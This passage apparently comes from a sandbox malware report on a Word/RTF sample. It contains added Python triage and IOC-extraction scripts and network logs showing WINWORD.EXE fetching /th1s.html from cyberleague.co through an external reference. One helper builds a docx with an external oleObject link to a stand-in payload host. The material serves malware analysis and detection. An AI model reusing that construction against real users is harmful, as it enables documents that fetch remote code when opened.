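def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension promises one container but the bytes are another."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = classify_by_magic(data)
    if ext == "rtf":
        return kind != "rtf"
    if ext in OOXML_EXTS:
        return kind != "docx"
    return False


def external_relationships(data: bytes) -> list:
    """List (part, relationship type, target) for every relationship in any
    .rels part that carries TargetMode="External": such targets are resolved
    outside the package instead of pointing at another part of the ZIP."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rtype, rel.get("Target", "")))
    return found


def triage(filename: str, data: bytes) -> list:
    """Static findings a reviewer wants before the file is opened anywhere."""
    findings = []
    kind = classify_by_magic(data)
    if extension_mismatch(filename, data):
        findings.append(f"extension does not match content: {filename!r} is {kind}")
    if kind == "docx":
        for part, rtype, target in external_relationships(data):
            findings.append(f"external {rtype} relationship in {part} -> {target}")
    return findings


def build_sample_docx(external_target: str) -> bytes:
    """Constructed minimal OOXML package (not the analysed sample) whose
    document.xml.rels carries one internal and one external relationship."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels",
                    f'<?xml version="1.0"?><Relationships xmlns="{REL_NS}">'
                    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
                    f'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="{external_target}" TargetMode="External"/>'
                    '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # The target URL is a placeholder for the demonstration, not from the sample.
    sample = build_sample_docx("http://example.invalid/payload.html")
    for line in triage("20220531_180800.rtf", sample):
        print(line)
```

Run against a real file, `triage(path, open(path, "rb").read())` gives the same two kinds of finding; an external relationship is not malicious by itself (linked pictures and hyperlinks use the same mechanism), so the relationship type and the target's scheme are what decide whether the file goes to a sandbox.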

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jun 3, 2022 23:03:12.042546988 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.042619944 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.042687893 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.043098927 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.043123007 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.441701889 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.441899061 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.594789982 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.594856024 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.595130920 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.597747087 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.644520998 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.826128006 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.826225042 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.826323032 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.839334011 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.839390993 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.839407921 CEST  49741        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.839416027 CEST  443          49741      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.925065994 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.925132036 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:12.925210953 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.926445961 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:12.926471949 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.308842897 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.313462019 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.313499928 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.314897060 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.314929008 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685409069 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685566902 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685663939 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.685729027 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685750008 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.685764074 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:13.685776949 CEST  49744        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:13.685785055 CEST  443          49744      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:16.733316898 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:16.733378887 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:16.733489990 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:16.733768940 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:16.733787060 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.141038895 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.141642094 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.141695976 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.142771006 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.142786026 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.544548035 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.544698954 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.544766903 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.544823885 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.544878960 CEST  49746        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.544899940 CEST  443          49746      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.729070902 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.729166031 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:17.729268074 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.729895115 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:17.729923964 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.112638950 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.112771988 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.122047901 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.122102022 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.122711897 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.122807026 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.123374939 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.164509058 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487524033 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487576008 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487673044 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.487715006 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.487747908 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.487756968 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.488909006 CEST  49747        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.488945007 CEST  443          49747      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.696450949 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.696521044 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:18.696635008 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.696944952 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:18.696978092 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.077434063 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.077559948 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.077939987 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.077960014 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.082124949 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.082139015 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454433918 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454556942 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454586983 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454638958 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454749107 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454785109 CEST  443          49748      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.454799891 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.454858065 CEST  49748        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.638972998 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.639030933 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:19.639137030 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.639359951 CEST  49749        443        192.168.2.3    13.250.15.191
Jun 3, 2022 23:03:19.639388084 CEST  443          49749      13.250.15.191  192.168.2.3
Jun 3, 2022 23:03:20.015038967 CEST  443          49749      13.250.15.191  192.168.2.3
                                                                                                                                                            Jun 3, 2022 23:03:20.015166998 CEST49749443192.168.2.313.250.15.191
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jun 3, 2022 23:03:11.982377052 CEST  58116        53         192.168.2.3  8.8.8.8
Jun 3, 2022 23:03:12.041520119 CEST  53           58116      8.8.8.8      192.168.2.3
Jun 3, 2022 23:03:17.620388031 CEST  65358        53         192.168.2.3  8.8.8.8
Jun 3, 2022 23:03:17.727202892 CEST  53           65358      8.8.8.8      192.168.2.3
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class
Jun 3, 2022 23:03:11.982377052 CEST  192.168.2.3  8.8.8.8  0x8c64    Standard query (0)  cyberleague.co  A (IP address)  IN (0x0001)
Jun 3, 2022 23:03:17.620388031 CEST  192.168.2.3  8.8.8.8  0x2d69    Standard query (0)  cyberleague.co  A (IP address)  IN (0x0001)
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name            CName  Address        Type            Class
Jun 3, 2022 23:03:12.041520119 CEST  8.8.8.8    192.168.2.3  0x8c64    No error (0)  cyberleague.co  -      13.250.15.191  A (IP address)  IN (0x0001)
Jun 3, 2022 23:03:17.727202892 CEST  8.8.8.8    192.168.2.3  0x2d69    No error (0)  cyberleague.co  -      13.250.15.191  A (IP address)  IN (0x0001)
• cyberleague.co

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.3  49741        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:12 UTC  0                   OUT        OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
2022-06-03 21:03:12 UTC  0                   IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:12 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
Allow: GET,POST,OPTIONS,HEAD,TRACE


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.3  49744        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:13 UTC  0                   OUT        HEAD /th1s.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
2022-06-03 21:03:13 UTC  0                   IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:13 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
10          192.168.2.3  49754        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:25 UTC  9                   OUT        HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:25 UTC  9                   IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:25 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
11          192.168.2.3  49755        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:28 UTC  10                  OUT        HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:29 UTC  10                  IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:29 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.3  49746        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:17 UTC  0                   OUT        OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
2022-06-03 21:03:17 UTC  1                   IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:17 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
Allow: GET,POST,OPTIONS,HEAD,TRACE


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
3           192.168.2.3  49747        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:18 UTC  1                   OUT        GET /th1s.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:18 UTC  1                   IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:18 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes
Data Ascii: <!DOCTYPE html><html><body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
4           192.168.2.3  49748        13.250.15.191   443               C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp                kBytes transferred  Direction  Data
2022-06-03 21:03:19 UTC  6                   OUT        HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
2022-06-03 21:03:19 UTC  7                   IN         HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:19 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID:5
Source IP:192.168.2.3
Source Port:49749
Destination IP:13.250.15.191
Destination Port:443
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp:2022-06-03 21:03:20 UTC  kBytes transferred:7  Direction:OUT
Data:
HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
Timestamp:2022-06-03 21:03:20 UTC  kBytes transferred:7  Direction:IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:20 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID:6
Source IP:192.168.2.3
Source Port:49750
Destination IP:13.250.15.191
Destination Port:443
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp:2022-06-03 21:03:20 UTC  kBytes transferred:7  Direction:OUT
Data:
OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
Timestamp:2022-06-03 21:03:21 UTC  kBytes transferred:7  Direction:IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:21 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
Allow: GET,POST,OPTIONS,HEAD,TRACE


Session ID:7
Source IP:192.168.2.3
Source Port:49751
Destination IP:13.250.15.191
Destination Port:443
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp:2022-06-03 21:03:21 UTC  kBytes transferred:8  Direction:OUT
Data:
HEAD /th1s.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: cyberleague.co
Timestamp:2022-06-03 21:03:22 UTC  kBytes transferred:8  Direction:IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:22 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID:8
Source IP:192.168.2.3
Source Port:49752
Destination IP:13.250.15.191
Destination Port:443
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp:2022-06-03 21:03:22 UTC  kBytes transferred:8  Direction:OUT
Data:
GET /th1s.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: cyberleague.co
If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
If-None-Match: "13e4-5e063d0e1ca1e"
Connection: Keep-Alive
Timestamp:2022-06-03 21:03:23 UTC  kBytes transferred:8  Direction:IN
Data:
HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:23 GMT
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes


Session ID:9
Source IP:192.168.2.3
Source Port:49753
Destination IP:13.250.15.191
Destination Port:443
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp:2022-06-03 21:03:24 UTC  kBytes transferred:9  Direction:OUT
Data:
HEAD /th1s.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: cyberleague.co
Connection: Keep-Alive
Timestamp:2022-06-03 21:03:24 UTC  kBytes transferred:9  Direction:IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 03 Jun 2022 21:03:24 GMT
Content-Type: text/html
Content-Length: 5092
Connection: close
Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
ETag: "13e4-5e063d0e1ca1e"
Accept-Ranges: bytes
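What the sessions above record is Word itself, not a browser, probing cyberleague.co with its "Existence Discovery" HEAD requests and then fetching /th1s.html: this is the network side of the report's "Contains an external reference to another file" signature. The script below is an added example and not part of the Joe Sandbox report. It turns session records, constructed here from the rows above and trimmed to the headers the logic needs, into an HTTP timeline and a list of network IOCs; the record layout and the OFFICE_IMAGES set are this example's own assumptions.

```python
"""IOC extraction from the HTTP session rows of a Joe Sandbox report.

Added example, not part of the report. SESSIONS is constructed from the
page's session 5 (HEAD probe) and session 8 (GET) rows, with the request and
response headers trimmed, so the script runs offline."""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE"

# Constructed from the report's session tables (assumed record layout).
SESSIONS = [
    {"session": 5, "dst": "13.250.15.191", "port": 443, "process": WINWORD,
     "direction": "OUT", "ts": "2022-06-03 21:03:20 UTC",
     "data": "HEAD /th1s.html HTTP/1.1\r\nAuthorization: Bearer\r\n"
             "User-Agent: Microsoft Office Existence Discovery\r\n"
             "Host: cyberleague.co\r\nConnection: Keep-Alive\r\n\r\n"},
    {"session": 5, "dst": "13.250.15.191", "port": 443, "process": WINWORD,
     "direction": "IN", "ts": "2022-06-03 21:03:20 UTC",
     "data": "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\n"
             "Content-Type: text/html\r\nContent-Length: 5092\r\n\r\n"},
    {"session": 8, "dst": "13.250.15.191", "port": 443, "process": WINWORD,
     "direction": "OUT", "ts": "2022-06-03 21:03:22 UTC",
     "data": "GET /th1s.html HTTP/1.1\r\nAccept: */*\r\n"
             "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; "
             "WOW64; Trident/7.0; ms-office; MSOffice 16)\r\n"
             "Host: cyberleague.co\r\nIf-None-Match: \"13e4-5e063d0e1ca1e\"\r\n\r\n"},
    {"session": 8, "dst": "13.250.15.191", "port": 443, "process": WINWORD,
     "direction": "IN", "ts": "2022-06-03 21:03:23 UTC",
     "data": "HTTP/1.1 304 Not Modified\r\nServer: nginx/1.18.0 (Ubuntu)\r\n"
             "ETag: \"13e4-5e063d0e1ca1e\"\r\n\r\n"},
]

# Office image names whose direct HTTP traffic we treat as an external reference fetch.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/1\.[01]$")
STATUS_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})")


@dataclass
class HttpMessage:
    method: Optional[str]
    path: Optional[str]
    status: Optional[int]
    headers: Dict[str, str]


@dataclass
class Fetch:
    session: int
    ts: str
    process: str
    method: str
    url: str
    user_agent: str
    status: Optional[int]
    content_type: Optional[str]


def parse_http(raw: str) -> HttpMessage:
    """Parse the first line and the headers of a raw request or response."""
    first, _, rest = raw.partition("\r\n")
    headers: Dict[str, str] = {}
    for line in rest.split("\r\n"):
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    req = REQUEST_LINE.match(first)
    if req:
        return HttpMessage(req.group(1), req.group(2), None, headers)
    resp = STATUS_LINE.match(first)
    return HttpMessage(None, None, int(resp.group(1)) if resp else None, headers)


def office_external_fetches(sessions: List[dict]) -> List[Fetch]:
    """Requests an Office process made itself, each paired with the response of
    the same session. This is the traffic behind the report's signature
    'Contains an external reference to another file'."""
    by_session: Dict[int, List[dict]] = {}
    for rec in sessions:
        by_session.setdefault(rec["session"], []).append(rec)
    fetches: List[Fetch] = []
    for sid, recs in sorted(by_session.items()):
        req = next((r for r in recs if r["direction"] == "OUT"), None)
        resp = next((r for r in recs if r["direction"] == "IN"), None)
        if req is None or ntpath.basename(req["process"]).lower() not in OFFICE_IMAGES:
            continue
        msg = parse_http(req["data"])
        if msg.method is None:
            continue
        scheme = "https" if req["port"] == 443 else "http"
        host = msg.headers.get("host", req["dst"])
        reply = parse_http(resp["data"]) if resp else None
        fetches.append(Fetch(sid, req["ts"], req["process"], msg.method,
                             f"{scheme}://{host}{msg.path}",
                             msg.headers.get("user-agent", ""),
                             reply.status if reply else None,
                             reply.headers.get("content-type") if reply else None))
    return fetches


def iocs(sessions: List[dict]) -> Dict[str, List[str]]:
    """Network IOCs to block or hunt for: URLs, hosts and destination IPs."""
    fetches = office_external_fetches(sessions)
    return {
        "urls": sorted({f.url for f in fetches}),
        "hosts": sorted({f.url.split("/")[2] for f in fetches}),
        "ips": sorted({r["dst"] for r in sessions}),
    }


if __name__ == "__main__":
    for f in office_external_fetches(SESSIONS):
        print(f"{f.ts} {f.method:4} {f.url} -> {f.status} {f.content_type or ''} [{f.user_agent}]")
    print(iocs(SESSIONS))
```

Note that the GET in session 8 returns 304 because Word sent the ETag it already held, so that exchange carries no HTML body; the HEAD responses only reveal its size (5092 bytes) and type (text/html), and the file itself has to be recovered from an earlier 200 response or from the WinINet cache on the analysis machine.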



Target ID:0
Start time:23:03:06
Start date:03/06/2022
Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:0xe80000
File size:1937688 bytes
MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:1
Start time:23:03:11
Start date:03/06/2022
Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit):true
Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase:0xb80000
File size:466688 bytes
MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:9
Start time:23:03:27
